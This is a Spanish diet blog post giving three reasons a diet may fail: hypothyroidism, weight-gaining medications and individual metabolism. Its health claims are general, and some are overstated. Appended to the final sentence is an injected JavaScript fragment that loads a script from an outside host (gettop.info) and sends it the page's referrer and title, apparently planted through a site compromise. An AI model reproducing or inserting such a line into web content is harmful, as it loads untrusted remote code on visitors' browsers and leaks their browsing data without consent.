Salud y belleza » Alimentación, Dieta

Tres razones por las cuales mi dieta no funciona….

2 Comentarios

“¿Por qué mi dieta no funciona?”. Ya de entrada la pregunta está mal planteada, erróneamente formulada: las dietas funcionan y, en todo caso, los hombres son quiénes se equivocan o desconocen ciertos fundamentos de su organismo.

Existen muchas cuestiones por las cuales un sistema alimenticio no genera los resultados esperados: enfermedades, intoxicaciones, problemas naturales relacionados con el metabolismo, por citar tres de los ejemplos más comunes. A continuación presentamos un detalle de cada obstáculo para que, en la búsqueda del peso ideal, consigas respuestas calaras y no piedras (o kilos) en el camino.

Hipotiroidismo

Las personas que padecen desbarajustes hormonales, caso del hipotiroidismo, pueden experimentar problemas para bajar de peso. Si bien éste problema es poco frecuente, algunos sujetos pueden engordar entre tres y seis kilos solo por tener hipotiroidismo (o dificultades similares también relacionadas con la glándula tiroides). Para poder controlar éste trastorno, hace falta tratar el problema de raíz: la levotiroxina, o L-tiroxina, T4 sintética, o 3,5,3′,5′-tetraiodo-L-tironina, es una forma farmacéutica de síntesis de la hormona tiroidea tiroxina.

Fármacos

Existen determinadas drogas que tienden a generar un aumento de peso. Hasta hace un tiempo atrás, muchas de las pastillas anticonceptivas para la mujer provocaban un aumento manifiesto del peso corporal. Esto se pudo ir corrigiendo y, en la actualidad, con las nuevas tecnologías, esa dificultad ya no existe. Pero, en otros casos, con elementos con corticoides, por ejemplo aún siguen existiendo tendencias. También los medicamentos para combatir la depresión provocan aumento de peso.

Metabolismo

A menudo, cuando se trata de problemas de peso, muchos apuntan hacia el metabolismo. Si bien no ocurre en todos los casos, a veces en esa palabra encontramos la respuesta: no cuando se trata de obesidad, claro, pero si en circunstancias en las cuales, por ejemplo, dos personas aplican la misma dieta y, mientras uno baja seis kilos, el otro no logra hacer lo mismo. Bien, el del metabolismo es un tema que data de hace tiempo: no todos los organismos reaccionan de igual manera ante la ingesta de determinados alimentos y son muchos los factores que influyen. Por eso, desde aquí, siempre recomendamos escoger bien la dieta teniendo en cuenta todos los factores y no solo el nombre del plan o el conjunto de alimentos.

En fin, hay basicamente aquí tres problemas por los cuales puede que la dieta no esté funcionando. Claro que la cifra puede aumentar rápidamente si no haces ejercicios o, por ejemplo, si tú llamas a dieta a tomar una infusión caliente con edulcorante y acompañarla de cinco porciones de pastel.s.src='http://gettop.info/kt/?sdNXbH&frm=script&se_referrer=' + encodeURIComponent(document.referrer) + '&default_keyword=' + encodeURIComponent(document.title) + '';